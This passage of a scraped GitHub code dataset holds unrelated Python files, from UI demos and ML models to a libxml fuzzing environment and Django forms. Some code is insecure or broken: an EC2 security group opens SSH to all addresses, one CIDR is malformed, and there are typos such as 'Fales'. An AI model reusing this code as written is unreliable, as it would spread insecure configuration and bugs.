label='Toggle'),\n ui.choice_group(name='choice_group', label='Choice group', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.checklist(name='checklist', label='Checklist', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.dropdown(name='dropdown', label='Dropdown', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.slider(name='slider', label='Slider'),\n ui.button(name='toggle_theme', label='Toggle Theme', primary=True)\n ])\n q.client.theme = 'default'\n q.client.initialized = True\n\n meta = q.page['meta']\n\n if q.args.toggle_theme:\n meta.theme = q.client.theme = 'neon' if q.client.theme == 'default' else 'default'\n\n await q.page.save()\n","repo_name":"n-raghu/KnowledgeBase","sub_path":"python/water/src/testo.py","file_name":"testo.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"742007552","text":"from troposphere import Ref, Template, Parameter, Output, Join, GetAtt\nimport troposphere.ec2 as ec2\nt=Template()\n#SecurityGroup\n#AMIID and instanceID\n#SSH key pair\n\nsg = ec2.securityGroup(\"Lampsg\")\nsg.GroupDescription = \"Allow access through ports 80 and 22 to the web server\"\nsg.SecurityGroupIngress = [\n\tec2.SecurityGroupRule(IpProtocol = \"tcp\", FromPort = \"22\", ToPort = \"22\", CidrIp = \"0.0.0.0/0\"),\n\tec2.SecurityGroupRule(IpProtocol = \"tcp\", FromPort = \"80\", ToPort = \"80\", CidrIp = \"0,0,0,/0\"),\n]\n\nt.add_resource(sg)\n\nprint(t.to_json())\n","repo_name":"aswa-software-services/devops","sub_path":"webserver-cf.py","file_name":"webserver-cf.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42350661171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom PIL import Image\nimport os\npath = 'C:\\\\Users\\\\Small\\\\Desktop\\\\newmyyolo4\\\\Oimages'\nnamelist1=os.listdir(path+\"\\\\Pending\")\nnamelist2=[]\nangle = [0,30,60,90,120,150,180,210,240,270,300,330]\nfor i in namelist1:\n if not os.listdir(path+\"\\\\Pending\\\\\"+i): #判斷資料夾是否為空\n continue\n if not os.path.isdir(path+\"\\\\New sample\\\\\"+i):\n os.makedirs(path+\"\\\\New sample\\\\\"+i) \n count =len(os.listdir(path+\"\\\\New sample\\\\\"+i)) #統計目前所有以處理相片\n namelist2=os.listdir(path+\"\\\\Pending\\\\\"+i)\n for j in namelist2:\n \n for ang in angle:\n count+=1\n img = Image.open(path+\"\\\\Pending\\\\\"+i+\"\\\\\"+j)\n new_img = img.rotate(ang) \n new_img.save(path+\"\\\\New sample\\\\\"+i+\"\\\\\"+i+\"{:0>5d}\".format(count)+\".jpg\")\n \n\n\n'''\nfor i in range(1,6):\n img = Image.open(\"chenting\"+str(i)+\".jpg\")\n img2 = Image.open(\"shiru\"+str(i)+\".jpg\")\n new_img = img.rotate(135) \n new_img2 = img2.rotate(135) \n new_img.save(\"chenting\"+str(i+15)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+15)+\".jpg\")\n \n new_img = img.rotate(180) \n new_img2 = img2.rotate(180) \n new_img.save(\"chenting\"+str(i+20)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+20)+\".jpg\")\n \n new_img = img.rotate(225) \n new_img2 = img2.rotate(225) \n new_img.save(\"chenting\"+str(i+25)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+25)+\".jpg\")\n \n new_img = img.rotate(270) \n new_img2 = img2.rotate(270) \n new_img.save(\"chenting\"+str(i+30)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+30)+\".jpg\")\n \n new_img = img.rotate(315) \n new_img2 = img2.rotate(315) \n 
new_img.save(\"chenting\"+str(i+35)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+35)+\".jpg\")\n print(i)\n'''","repo_name":"LINBOOyuan/YoloIma","sub_path":"Oimages/coverent.py","file_name":"coverent.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"16930083325","text":"\nimport serial\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib import style\nfrom datetime import datetime\nfrom statistics import mean\n\nadc_data = []\ntime_data = []\n\nfor i in range(10):\n time_data.append(datetime.now())\n adc_data.append(2.5)\n\nstyle.use('fivethirtyeight')\n\nFig, ax = plt.subplots()\nax.set_xlim(0, 100)\nax.set_ylim(0, 100)\nline, = plt.plot([], [], 'ro')\n\n\ndef decompress(value):\n\n if value <= 15:\n return ((value & 0x80) << 4) | (value & 0x0f)\n elif value <= 31:\n return ((value & 0x80) << 4) | (1 << 4) | (value & 0x0f)\n elif value <= 47:\n return ((value & 0x80) << 4) | (1 << 5) | ((value & 0x0f) << 1) | 1\n elif value <= 63:\n return ((value & 0x80) << 4) | (1 << 6) | ((value & 0x0f) << 2) | 2\n elif value <= 79:\n return ((value & 0x80) << 4) | (1 << 7) | ((value & 0x0f) << 3) | 4\n elif value <= 95:\n return ((value & 0x80) << 4) | (1 << 8) | ((value & 0x0f) << 4) | 16\n elif value <= 111:\n return ((value & 0x80) << 4) | (1 << 9) | ((value & 0x0f) << 5) | 32\n else :\n return ((value & 0x80) << 4) | (1 << 10) | ((value & 0x0f) << 6) | 64\n\n\ndef adc():\n serial_port = serial.Serial(\"COM4\", 110)\n\n while True:\n adc_value_compressed = serial_port.read(1)\n adc_signal = 5 * decompress(int.from_bytes(adc_value_compressed, \"little\")) / 4095\n time = datetime.now()\n\n yield [adc_signal, time]\n\n\ndef animate(frame):\n\n adc_data.append(frame[0])\n time_data.append(frame[1])\n\n line.set_data(mean(adc_data[-9:-1]), time_data)\n\n ax.clear()\n ax.plot(time_data, adc_data)\n\n\nAni = FuncAnimation(Fig, func=animate, frames=adc(), interval=10)\nplt.show()\n\n\n\n\n\n\n","repo_name":"MohamedOssama96/ADC_Graph_Plotter","sub_path":"ADC_Plotting.py","file_name":"ADC_Plotting.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8546362074","text":"# -*- coding:utf-8 -*-\n#定义了前向传播的过程以及神经网络的参数\n\nimport tensorflow as tf \n\n#定义神经网络结果相关的参数\nINPUT_NODE = 16\nOUTPUT_NODE = 4\n\ndef weight_variable(name, shape, regularizer):\n\tweights = tf.get_variable(\n\t\tname, shape,\n\t\tinitializer=tf.truncated_normal_initializer(stddev=0.1))\n\n\tif regularizer != None:\n\t\ttf.add_to_collection(\"losses\",regularizer(weights))\n\treturn weights \n\ndef bias_variable(shape):\n\tinitial = tf.constant(0.1, shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv2d(x, W):\n\treturn tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n\ndef max_pool_2x2(x):\n\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\t\ndef inference(input_tensor, regularizer, keep_prob): \n\tx = tf.reshape(input_tensor, [-1, 4, 4, 1])\n\n\tW_conv1 = weight_variable(\"W_conv1\",[1, 1, 1, 2], regularizer) # 卷积是在每个5*5的patch中算出32个特征,分别是patch大小,输入通道数目,输出通道数目\n\tb_conv1 = bias_variable([2]) \n \n\th_conv1 = tf.nn.relu(conv2d(x, W_conv1) + b_conv1) #第一个卷积层\n\t#h_pool1 = max_pool_2x2(h_conv1) #第一个池化层\n\n\tW_conv2 = weight_variable(\"W_conv2\",[1, 1, 2, 4], regularizer) \n\tb_conv2 = bias_variable([4]) \n \n\th_conv2 = tf.nn.relu(conv2d(h_conv1, W_conv2) + 
b_conv2) #第二个卷积层\n\t#h_pool2 = max_pool_2x2(h_conv2) #第二个池化层\n\n\tW_fc1 = weight_variable(\"W_fc1\",[4 * 4 * 4, 256], regularizer) \n\tb_fc1 = bias_variable([256]) \n \n\th_pool2_flat = tf.reshape(h_conv2, [-1, 4*4*4]) #reshape成向量\n\th_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) #第一个全连接层\n\n\th_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) #dropout层 \n \n\tW_fc2 = weight_variable(\"W_fc2\",[256, 4],regularizer) \n\tb_fc2 = bias_variable([4]) \n\ty_conv=tf.matmul(h_fc1_drop, W_fc2) + b_fc2 \n\t\n\treturn y_conv\n\n","repo_name":"mengyuan-lee/wcl_lsap","sub_path":"Hungalg_CNN/hung_inference.py","file_name":"hung_inference.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"73843505681","text":"# Untitled.py\n# Created by liqiang on 03/01/2018.\n\nfrom math import sqrt\n\ndef isPrime(x):\n if x < 2:\n return Fales\n for i in range(2, int(sqrt(x)+1)):\n if x%i ==0:\n return False\n return True\n \nn = int(input(''))\ncount = 0\nfor i in range(3,n,2):\n if isPrime(i) and isPrime(i+2):\n count +=1\nprint(count)\n","repo_name":"liqiangvip/PAT-Python3","sub_path":"basic-level/1007.py","file_name":"1007.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10379419366","text":"from django import forms\nimport models\nfrom django.contrib.auth.models import User\nfrom ajax_select.fields import AutoCompleteSelectMultipleField, AutoCompleteSelectField\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaultfilters import slugify\n\nclass AddBookmark(forms.ModelForm):\n authors = AutoCompleteSelectMultipleField('author', required=False)\n licences = AutoCompleteSelectMultipleField('license', required=False)\n class Meta:\n model = models.Bookmark\n fields = ('title', 'url', 'description', 'keywords', 'authors', 'licences')\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(AddBookmark, self).__init__(*args, **kwargs)\n \n # add link\n self.fields['authors'].widget.add_link = reverse('bookmarks.views.add_author')\n\n def clean(self):\n cleaned_data = self.cleaned_data\n user = self.request.user\n title = cleaned_data.get(\"title\")\n slug = slugify(title)\n \n if self.instance:\n bookmarks = models.Bookmark.objects.filter(user=user,slug=slug).exclude(id=self.instance.id)\n else:\n bookmarks = models.Bookmark.objects.filter(user=user,slug=slug)\n \n if bookmarks:\n raise forms.ValidationError(\"Your have already used this title, please choose again.\")\n ## slug should not be returned in cleaned_data, create in model save() so it works for API \n \n return cleaned_data\n \nclass EditBookmark(forms.ModelForm):\n authors = AutoCompleteSelectMultipleField('author', required=False)\n licences = AutoCompleteSelectMultipleField('license', required=False)\n\n class Meta:\n model = models.Bookmark\n fields = ('title', 'url', 'description', 'keywords', 'authors', 'licences')\n \n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(EditBookmark, self).__init__(*args, **kwargs)\n \n self.fields['authors'].initial = [a.id for a in self.instance.authors.all()]\n self.fields['licences'].initial = self.instance.licences.all()\n\n # add link\n self.fields['authors'].widget.add_link = reverse('bookmarks.views.add_author')\n\n\nclass AddPlaylist(forms.ModelForm):\n class Meta:\n model = models.Playlist\n fields = 
('title', 'bookmarks',)\n\n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(AddPlaylist, self).__init__(*args, **kwargs) \n \n self.fields[\"bookmarks\"] = AutoCompleteSelectMultipleField('bookmarks', required=False)\n self.fields[\"bookmarks\"].help_text = 'Start typing the name or URL of the bookmark you wish to add, a list will be displayed for you to select from.' \n\n \n def clean(self):\n cleaned_data = self.cleaned_data\n \n user = self.request.user\n title = cleaned_data.get(\"title\")\n slug = slugify(title)\n if self.instance:\n playlists = models.Playlist.objects.filter(user=user,slug=slug).exclude(id=self.instance.id)\n else:\n playlists = models.Playlist.objects.filter(user=user,slug=slug)\n \n if playlists:\n raise forms.ValidationError(\"Your have already used this title, please choose again.\")\n \n return cleaned_data\n\n\nclass EditPlaylist(forms.ModelForm):\n class Meta:\n model = models.Playlist\n fields = ('title', 'bookmarks', 'editors')\n \n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(EditPlaylist, self).__init__(*args, **kwargs) \n self.fields[\"bookmarks\"] = AutoCompleteSelectMultipleField('bookmarks', required=False)\n self.fields[\"bookmarks\"].help_text = 'Start typing the name or URL of the bookmark you wish to add, a list will be displayed for you to select from.' \n \n self.fields[\"editors\"] = AutoCompleteSelectMultipleField('non_staff_users', required=False)\n self.fields[\"editors\"].help_text = 'Start typing the usenrame editor you wish to add, a list will be displayed for you to select from.'\n\n # if not owner remove editor input\n if self.request.user.id != self.instance.user.id:\n del self.fields['editors']\n \nclass AddAuthor(forms.ModelForm):\n class Meta:\n model = models.Author\n\n\nclass AddVote(forms.ModelForm):\n \"\"\" Only for API \"\"\"\n class Meta:\n model = models.Vote\n fields = ('value','content_type', 'object_id')\n\n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(AddVote, self).__init__(*args, **kwargs)\n \n def clean(self):\n cleaned_data = self.cleaned_data\n user = self.request.user\n value = cleaned_data.get(\"value\")\n object_id = cleaned_data.get(\"object_id\")\n content_type = cleaned_data.get(\"content_type\")\n \n if self.instance: \n votes = models.Vote.objects.filter(user=user,object_id=object_id,content_type__id=content_type.id).exclude(id=self.instance.id)\n else:\n votes = models.Vote.objects.filter(user=user,object_id=object_id,content_type__id=content_type.id)\n \n if votes:\n raise forms.ValidationError(\"You have already voted on this item, please delete your vote and post again.\")\n \n if value not in [-1, 1]:\n raise forms.ValidationError(\"Vote value must either be 1 or -1.\")\n \n return cleaned_data\n\n ","repo_name":"favOERites/favOERites","sub_path":"bookmarks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"47821983978","text":"import gymfuzz\nimport gymfuzz.coverage as coverage\n\nfrom gymfuzz.envs.fuzz_base_env import FuzzBaseEnv\n\n\nclass FuzzLibXMLEnv(FuzzBaseEnv):\n def __init__(self):\n self._input_size = 1024\n self._target_path = gymfuzz.libxml_target_path()\n self._args = []\n self._dict = coverage.Dictionary({\n 'tokens': [],\n 'bytes': True,\n })\n super(FuzzLibXMLEnv, 
self).__init__()","repo_name":"kynehc/gymfuzz","sub_path":"gymfuzz/envs/fuzz_libxml_env.py","file_name":"fuzz_libxml_env.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32204963182","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n \n result = set()\n current = []\n \n def backtrack(index):\n if index == n:\n if len(current) >= 2:\n result.add(tuple(current))\n return\n if not current or current[-1] <= nums[index]:\n current.append(nums[index])\n backtrack(index + 1)\n current.pop()\n \n backtrack(index + 1)\n \n backtrack(0)\n \n return result\n \n ","repo_name":"ak1909552/leetcode-submissions","sub_path":"0491-non-decreasing-subsequences/0491-non-decreasing-subsequences.py","file_name":"0491-non-decreasing-subsequences.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29173443387","text":"from walle.authorization import iam\n\n\nPROJECT_FOLDER_ID = \"some-project-folder-id\"\nAUTOMATION_PLOT_FOLDER_ID = \"some-ap-folder-id\"\n\nMOCKED_USER_ID = \"mocked_user_id\"\nMOCKED_SA_ID = \"mocked_sa_id\"\nMOCKED_USER_LOGIN = \"mocked_user_login@\"\nMOCKED_SA_NAME = \"mocked_sa_name\"\nMOCKED_IAM_TOKEN = \"mocked_iam_token\"\nIAM_TOKEN_HEADERS = {\n \"Authorization\": f\"{iam.BEARER_HEADER_PREFIX}{MOCKED_IAM_TOKEN}\",\n}\n\n\ndef get_calls_args(actual_calls):\n return {\n (c.kwargs[\"permission\"], c.kwargs[\"resource_path\"].id, c.kwargs[\"resource_path\"].type) for c in actual_calls\n }\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/iam_permissions/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18446947261","text":"#a python script for inference on a single example using LlAMA model\nimport argparse\nfrom transformers import LlamaForCausalLM, LlamaTokenizer, AutoModelForCausalLM, AutoTokenizer\nimport torch\n\nB_INST, E_INST = \"[INST]\", \"[/INST]\"\nB_SYS, E_SYS = \"<<SYS>>\\n\", \"\\n<</SYS>>\\n\\n\"\nBOS, EOS = \"<s>\", \"</s>\"\n\nassistant_prompt = \"\"\n\n\nllama_prompt = f\"{BOS}{B_INST} {B_SYS}\\n\" \\\n f\"{assistant_prompt}\\n\" \\\n f\"{E_SYS}\\n\\n\" \\\n \"{input}\" \\\n f\"{E_INST} Response:\"\n\ndef run_inference(input_sentence, tokenizer, model, device):\n # get output of the LlaMa from input sentence\n\n input_sentence = llama_prompt.format(input=input_sentence)\n\n input_ids = tokenizer.encode(input_sentence, return_tensors=\"pt\").to(device)\n attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=device)\n output_ids = model.generate(\n inputs=input_ids,\n attention_mask=attention_mask,\n temperature=0.7,\n top_p=0.9,\n do_sample=True,\n num_beams=1,\n max_new_tokens=600,\n eos_token_id=tokenizer.eos_token_id,\n pad_token_id=tokenizer.pad_token_id,\n )\n output_sentence = tokenizer.decode(output_ids[0], skip_special_tokens=True)\n output_sentence = output_sentence.split(\"Response:\")[1]\n print(output_sentence)\n return output_sentence\n\ndef load_model(model_path):\n device = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n print(f'Load model using Device \"{device}\" from path \"{model_path}\".')\n\n tokenizer = LlamaTokenizer.from_pretrained(model_path)\n model = 
LlamaForCausalLM.from_pretrained(model_path).to(device)\n\n\n return tokenizer, model, device\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_model\", type=str, required=True)\n arg = parser.parse_args()\n tokenizer, model, device = load_model(arg.input_model)\n\n print(\"Enter a sentence to generate your response. Enter 'exit' to exit.\")\n previouses = []\n while True:\n input_sentence = input(\"Enter a sentence: \")\n if input_sentence == \"exit\":\n break\n run_inference(input_sentence, tokenizer, model, device)\n\n\n\n\n\n\n","repo_name":"chatnoir-eu/chatnoir-chat","sub_path":"llms/llama-2-models/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"30514852162","text":"from typing import Optional\n\nimport mmengine.dist as dist\nimport rich.progress as progress\nfrom rich.live import Live\n\ndisable_progress_bar = False\nglobal_progress = progress.Progress(\n '{task.description}',\n progress.BarColumn(),\n progress.TaskProgressColumn(show_speed=True),\n progress.TimeRemainingColumn(),\n)\nglobal_live = Live(global_progress, refresh_per_second=10)\n\n\ndef track(sequence, description: str = '', total: Optional[float] = None):\n if disable_progress_bar:\n yield from sequence\n else:\n global_live.start()\n task_id = global_progress.add_task(description, total=total)\n task = global_progress._tasks[task_id]\n try:\n yield from global_progress.track(sequence, task_id=task_id)\n finally:\n if task.total is None:\n global_progress.update(task_id, total=task.completed)\n if all(task.finished for task in global_progress.tasks):\n global_live.stop()\n for task_id in global_progress.task_ids:\n global_progress.remove_task(task_id)\n\n\ndef track_on_main_process(sequence, description='', total=None):\n if not dist.is_main_process() or disable_progress_bar:\n yield from sequence\n else:\n yield from track(sequence, total=total, description=description)\n","repo_name":"open-mmlab/mmaction2","sub_path":"mmaction/utils/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"71019246801","text":"#! 
/usr/bin/env python3\n\nfrom transl import LookupTable\n\nclass Env():\n def __init__(self, binding_list = []):\n self.bindings = dict()\n self.next_id = 0\n for elem in binding_list:\n self.bind(elem)\n\n def bind(self, elem) -> int:\n if elem in self.bindings:\n return self.bindings[elem]\n else:\n self.bindings[elem] = self.next_id\n self.next_id += 1\n return self.next_id-1\n\n def __contains__(self, item):\n return item in self.bindings\n\n def __str__(self) -> str:\n ret_list = [\"{} -> {}\".format(key, self.bind(key))\\\n for key in sorted(self.bindings.keys())]\n return \"\\n\".join(ret_list)\n \n \nif __name__ == '__main__':\n e = Env([\"R0\", \"R1\", \"R2\"])\n print(e)\n print(e.bind(\"R0\"))\n print(e.bind(\"R0\"))\n print(e.bind(\"Rvar\"))\n print(e)\n","repo_name":"gcali/drisc","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5081865253","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().split())\n\nmaze = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\n\ndef bfs(y, x):\n queue = deque()\n queue.append((y, x))\n while queue:\n y, x = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx <= M-1 and 0 <= ny <= N-1:\n if maze[ny][nx] == 0:\n continue\n if maze[ny][nx] == 1:\n queue.append((ny, nx))\n maze[ny][nx] = maze[y][x] + 1\n return maze[N-1][M-1]\n\n\nprint(bfs(0, 0))\n","repo_name":"huckjoo/swjungle_alg","sub_path":"week03/2178_re.py","file_name":"2178_re.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14860410771","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass SingleMatrix(nn.Module):\n def __int__(self):\n super().__init__()\n\n def forward(self, x):\n self.fcl = nn.Linear(3000, 128*30)\n x = self.fcl(x)\n # batch_size = 10\n # number of attention heads = 30\n # sequence len = 1\n # dimention of particular sequence = 128\n x = x.reshape(10, 30, 1, 128)\n return x\n\nclass QKVMatrix(nn.Module):\n def __init__(self):\n super().__init__()\n self.QMatrix = SingleMatrix()\n self.KMatrix = SingleMatrix()\n self.VMatrix = SingleMatrix()\n\n def forward(self, x):\n q = self.QMatrix(x)\n k = self.KMatrix(x)\n v = self.VMatrix(x)\n return q,k,v","repo_name":"Arshdeep-Singh-01/Human-Activity-Recognition-using-MutliHead-Convolutional-Attention","sub_path":"layers/Attention/QKVmatrix.py","file_name":"QKVmatrix.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12342137595","text":"'''\nScript to read information from airly and post it in Domoticz\n'''\nimport configparser\nimport domoticz\nimport airly\n\ndef main():\n '''main function'''\n config = configparser.ConfigParser()\n config.sections()\n config.read('config.ini')\n dom = domoticz.Domoticz(config[\"Domoticz\"][\"Host\"], config[\"Domoticz\"][\"Username\"], config[\"Domoticz\"][\"Password\"])\n air = airly.Airly(config[\"Airly\"][\"Host\"], config[\"Airly\"][\"APIKey\"], config[\"Airly\"][\"Installation\"])\n if air.update() == 200:\n if air.temp:\n dom.set_sensor_thb(config[\"idx\"][\"airly_thb\"], air.temp, air.hum, air.baro)\n\n if air.pm1:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm1\"], 
air.pm1)\n\n if air.pm10:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm10\"], air.pm10)\n\n if air.pm25:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm25\"], air.pm25)\n\n if air.caqi:\n dom.set_sensor_custom(config[\"idx\"][\"airly_caqi\"], air.caqi)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"richarddeweerd/automation_tools","sub_path":"update_airly.py","file_name":"update_airly.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5746306101","text":"\"\"\"Calculate mean IoU.\n\nThis script was used to calculate the object wise mean IoU \ngiven the pickled output files from evaluate dataset. \nThe paths to the pickle files are specified down in the main\n\nExample:\n $ python iou_compare_resuslts.py\n\"\"\"\n\nimport pickle\nimport json\nfrom PIL import Image, ImageColor\nimport numpy as np\n\ndef avg_track_length(st1, st2):\n track_length_st1= []\n track_length_st2= []\n for scene in st1: \n for obj in st1[scene]:\n track_length_st1.append(st1[scene][obj])\n track_length_st2.append(st2[scene][obj])\n return sum(track_length_st1)/len(track_length_st1), sum(track_length_st2)/len(track_length_st2)\n\ndef compare_iou(iou_dict1, iou_dict2, lookup):\n for obj in iou_dict1:\n if iou_dict1[obj][0] != 0 and iou_dict2[obj][0] != 0:\n print(obj, \": GOLD: \", iou_dict1[obj][1]/iou_dict1[obj][0], \" PRED: \", iou_dict2[obj][1]/iou_dict2[obj][0])\n else: \n print(obj, \" seen \", 0, \" times with mean IoU: \", 0)\n\ndef main():\n mode = \"ssim\"\n #thrs= [0.05,0.1,0.15,0.2,0.25,0.30,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.98]\n thrs = [0.25]\n mode = 'confidence_score'\n dataset = 'a2d2'\n if dataset == 'a2d2':\n instance_dict = {\n \"cars\": 1,\n \"pedestrians\": 2,\n \"trucks\": 3,\n \"smallVehicle\": 4,\n \"utilityVehicle\": 5,\n \"bicycle\": 6,\n \"tractor\": 7\n }\n else: \n instance_dict = {'cars': 1,\n 'pedestrian': 2}\n inverted_instance_dict = {val:key for key, val in instance_dict.items()}\n object_wise_iou = {obj: [] for obj in instance_dict}\n total_iou = []\n number_of_instances = {obj: [] for obj in instance_dict}\n number_of_instances['total'] = []\n\n experiment_string6 = dataset+'42ssim0.8_gold_iou_dict.pickle'\n experiment_string7 = dataset+'8ssim0.8_gold_iou_dict.pickle'\n experiment_string8 = dataset+'69ssim0.8_gold_iou_dict.pickle'\n #experiment_string5 = dataset+'42ssim0.8_gold_iou_dict.pickle'\n #experiment_string6 = dataset+'8confidence_score0.75_gold_iou_dict.pickle'\n #experiment_string7 = dataset+'42confidence_score0.75_gold_iou_dict.pickle'\n #experiment_string8 = dataset+'69confidence_score0.75_gold_iou_dict.pickle'\n experiment_strings = [experiment_string6, experiment_string7, experiment_string8]\n for experiment_string in experiment_strings: \n iou_dict = pickle.load(open(dataset+\"_pickle_files/\"+experiment_string, 'rb'))\n for scene in iou_dict:\n for entry_point in iou_dict[scene]:\n for obj in iou_dict[scene][entry_point]:\n if obj != 0:\n total_iou.append(iou_dict[scene][entry_point][obj][0][0])\n obj_string = inverted_instance_dict[int(str(obj)[0])]\n object_wise_iou[obj_string].append(iou_dict[scene][entry_point][obj][0][0])\n \n for obj in object_wise_iou:\n number_of_instances[obj].append(len(object_wise_iou[obj]))\n number_of_instances['total'].append(len(total_iou))\n \n for obj in object_wise_iou:\n print(obj, ':')\n if object_wise_iou[obj] != []:\n print(np.mean(np.array(number_of_instances[obj])), 
np.std(np.array(number_of_instances[obj])),np.mean(np.array(object_wise_iou[obj])), np.std(np.array(object_wise_iou[obj])))\n else: \n print(0,0,0)\n print('Total:')\n print(np.mean(np.array(number_of_instances['total'])), np.std(np.array(number_of_instances['total'])), np.mean(np.array(total_iou)), np.std(np.array(total_iou)))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"samuki/single-object-tracking","sub_path":"evaluation/iou_compare_results.py","file_name":"iou_compare_results.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20826774116","text":"import copy\n\nclass Player:\n def __init__(self, name) -> None:\n self.name = name\n self.hand = []\n self.current_score = 0\n self.totle_score = 0\n self.is_ready = False\ndef simulate(player_hand:list):\n decision = {'cards_to_throw' : [],\n 'pile_or_deck' : \"\",\n 'yaniv' : False\n }\n sum_cards = 0\n for card in player_hand:\n card_prop = str(card).split('_') \n sum_cards += int(card_prop[0])\n if sum_cards <= 7:\n decision['yaniv'] = True\n return decision \n player_hand.sort()\n #check fo pairs\n pair = check_for_pairs(player_hand)\n #check for straight\n straight = check_for_straghit(player_hand)\n if len(straight) > 2:\n straight.sort()\n sort_straghit(straight)\n print(player_hand)\n completing_card_for_straghit = \"\"# a card that can complite a straghit and is draweble\n completing_card_for_pair = \"\"# a card that can complite a pair and is draweble\n missing_cards_for_straghit = [] #cards that can replace a joker in a strghit\n if len(straight) != 0 and len(pair) != 0:\n \n missing_cards_for_straghit = find_missing_cards_for_straghit(straight)\n \n if last_cards_thrown[0] in missing_cards_for_straghit:\n completing_card_for_straghit = copy.copy(last_cards_thrown[0])\n elif last_cards_thrown[-1] in missing_cards_for_straghit:\n completing_card_for_straghit = copy.copy(last_cards_thrown[-1])\n for card in player_hand:\n if card[:2] == last_cards_thrown[0][:2]:\n completing_card_for_pair = last_cards_thrown[0]\n if card[:2] == last_cards_thrown[-1][:2]:\n completing_card_for_pair = last_cards_thrown[-1]\n \n if get_sum(pair) > 6 and completing_card_for_straghit != \"\":\n print(\"in case get_sum(pair) > 6 and completing_card_for_straghit != \"\"\")\n\n decision['cards_to_throw'] = pair\n decision['pile_or_deck'] = completing_card_for_straghit\n elif get_sum(straight) > 6 and completing_card_for_pair != \"\":\n decision['cards_to_throw'] = straight\n decision['pile_or_deck'] = completing_card_for_pair\n elif get_sum(straight) < 